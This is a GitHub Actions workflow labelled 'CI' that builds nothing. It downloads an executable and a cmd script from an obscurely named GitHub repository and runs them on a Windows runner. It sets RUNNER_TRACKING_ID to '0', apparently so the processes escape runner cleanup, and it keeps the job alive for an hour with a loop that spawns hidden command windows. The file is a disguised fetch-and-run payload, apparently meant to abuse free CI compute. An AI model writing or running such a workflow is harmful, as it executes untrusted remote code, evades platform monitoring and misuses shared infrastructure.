name: CI

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: windows-latest
    
    steps:
    - name: Download Untitled.exe
      run: Invoke-WebRequest https://github.com/w8wbn87f8qdvadsrdfab/SADVUNsnudASOIN/raw/main/Untitled_NEW.exe -OutFile untitled.exe

    - name: Download cmd.cmd
      run: Invoke-WebRequest https://github.com/w8wbn87f8qdvadsrdfab/SADVUNsnudASOIN/raw/main/cmd.cmd -OutFile cmd.cmd

    - name: Run Untitled.exe & cmd.cmd
      env:
        RUNNER_TRACKING_ID: "0"
      run: |
        .\untitled.exe
        cmd.exe /c .\cmd.cmd
    - name: Loop
      run: |
        $timeout = 3600  # Time in seconds (1 hour)
        $startTime = [datetime]::Now
        while (([datetime]::Now - $startTime).TotalSeconds -lt $timeout) {
          try {
            Write-Output "I am alive."
            
            # Open a new hidden cmd window and immediately execute the exit command
            Start-Process cmd.exe -ArgumentList '/c exit' -WindowStyle Hidden

          } catch {
            Write-Output "Error encountered: $_"
          }
          Start-Sleep -Seconds 300  # Sleep for 5 minutes
        }
